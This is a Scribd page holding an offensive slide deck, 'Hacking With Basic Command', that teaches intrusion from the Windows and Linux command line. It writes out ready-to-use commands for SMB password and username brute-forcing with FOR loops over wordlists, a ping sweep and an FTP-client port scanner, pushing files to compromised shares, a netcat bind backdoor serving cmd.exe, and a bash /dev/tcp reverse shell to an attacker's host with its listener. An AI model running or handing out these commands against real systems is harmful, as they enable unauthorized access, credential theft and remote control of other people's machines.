Scribd
Upload
27 views

Hacking With Basic Command: Presented: Dedi Dwianto (Theday@echo - Or.id)

This document provides an overview of basic hacking techniques using Windows and Linux command lines. It discusses using tools like netcat, SMB sessions, FOR loops, and the /dev/tcp feature in Linux to perform tasks like port scanning, password guessing, file transfers, and creating backdoor shells. The document includes code examples for scanning IP ranges, transferring files over SMB shares, and establishing reverse shells using netcat or /dev/tcp connections. It aims to demonstrate common hacking methods that can be performed from the command line.

Uploaded by

pendekar jablay
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
27 views

Hacking With Basic Command: Presented: Dedi Dwianto (Theday@echo - Or.id)

This document provides an overview of basic hacking techniques using Windows and Linux command lines. It discusses using tools like netcat, SMB sessions, FOR loops, and the /dev/tcp feature in Linux to perform tasks like port scanning, password guessing, file transfers, and creating backdoor shells. The document includes code examples for scanning IP ranges, transferring files over SMB shares, and establishing reverse shells using netcat or /dev/tcp connections. It aims to demonstrate common hacking methods that can be performed from the command line.

Uploaded by

pendekar jablay
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 28

Hacking With Basic Command

Presented :
Dedi Dwianto
[[email protected]]
Contents
• Scenario
• Windows Command-Line Hacking
• Netcat
• Linux Commnad-Line Hacking
• Q&A
Scenario
Firewall

Network
Target

Internet

Attacker

WWW DNS e-rdc .org 2008


Windows Command
• Finding Others Machines
• SMB Sessions
• FOR Loops
• Password Guessing
• Port Scanner
• File Transfer
Finding other machines
• C:\>ipconfig /displaydns

• C:\>arp –a
Setting up smb sessions
• Set up session with a target

C:\> net use \\[targetIP] [password] /u:[user]

• Mount a Share on a target :


C:\> net use \\[targetIP]\[sharename] [password] /u:[user]
Dropping smb sessions
• Windows only accept one username at a time only
• Drop SMB Session
C:\> net use \\[TargetIP] /del

• Drop All SMB Session

C:> net use * /del


FOR Loops
• Common Option for Hacking
• FOR /L : Loop through a range of numbers
• FOR /F: Loop through items in a text file
FOR /L Loops
• FOR /L loops are counters :
c:\> for /L %i in ([start],[step],[stop]) do [command]
• Simple Counter
c:\> for /L %i in (1,1,255) do echo %i
FOR /L Loops
• Run Multiple Command
[command1] & [command2]

c:\> for /L %i in (1,1,10) do echo %i & ping –n 5 127.0.0.1

• Run Command1 and Run Command2 if Command1 run without


error
[command1] && [command2]
C:\> for /L %i in (1,1,10) do echo %ii && ping –n 5 127.0.0.1
FOR /L Loops : Handling Output
• Redirect to nul : > null

c:\> for /L %i in (1,1,10) do echo %i & ping –n 5 127.0.0.1 > nul

• Redirect to file : >filename

C:\> for /L %i in (1,1,10) do echo %i && ping –n 5 127.0.0.1 > result.txt

• Output find string : | find “[string name]”


• Redirect Error Message : [command] 2>null or [command] 2>>file
Simple Sweep Ping

C:\> for /L %i in (1,1,10) do echo %i & ping –n 5 192.168.114.%i | find “Reply”


FOR /F Loops
• Loop through text

• etc can be :
The contents
– FOR /F ["options"] %parameter IN (“etc") DO command
– String
– Command
Password Guessing with FOR /F
• Password Guessing via SMB
• You know Username
• Password list from John the Ripper’s password.lst

C:\>for /F %i in (password.lst) do @echo %i & @net use \\[targetIP] %i /u:[Username]


2>nul && pause && echo [Username] :%i >> done.txt
Username & Password
Guessing


Guees each passwordwith FOR
for each username
We need 2 file username & password list
/F
• 2 variable %u and %p for username & password
• Use net use for try SMB session
• Drop SMB if success Login

C:\>for /F %u in (user.txt) do @(for /F %p in (password.txt) do @echo %u : %p &


@net use \\[targetIP] %p /u:%u 2>nul && echo %u : %p >> done.txt &&
net use \\[targetIP] /del)
Windows Port Scanner With FTP Client
• Windows FTP Client C:\> ftp [IpAddress]
• Using –s option FTP for ready from file : c:\>ftp –s:[filename]
• We’ll write a loop that generate FTP command file and invoke FTP
to run from that command
• Store the result

for/L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt


& echo open [IPAddress] %i > ftp.txt & echo quit >> ftp.txt
& ftp -s:ftp.txt 2>>ports.txt
Windows Command Line File Transfer
• Use Windows File & Printer Sharing
• Redirect to Share folder :

C:\>type [filename] > \\[IPtarget]\[share]\[filename]

• Login to SMB Session take from Password Guessing

C:\> net use \\[IPTarget] [password] /u:[username]


Netcat
• TCP/UDP Network Widget
• Standard In and Send It across the network
• Receives data from network and put it to standard out

Std In Send Packets


NETCAT
Std Out Receives Packets

Std Error

SYSTEM NETWORK
Netcat Functions
• Send File
• Port Scan
• Backdoor Shell Access
• Connect to Open Port
• Simple Chats
• Replay Data in TCP/UDP Packets
• Etc …
Netcat : Windows Backdoor
nc -l -p [port] -e “cmd.exe”
Linux Command Line
• /dev/tcp/ Hacking
• Open Connection to Other Machines
• Like Connect Back Shell
• /dev/tcp/[IPAddress]/[Port]
Backdooring via /dev/tcp
/bin/bash -i > /dev/tcp/[IP Attacker]/[port] 0<&1 2>&1

/bin/bash -i > /dev/tcp/[ip]/[port] 0<&1


nc -l -p 80 2>&1
Firewall

Deny
Incoming
Type Command Command Execute
THANK YOU

You might also like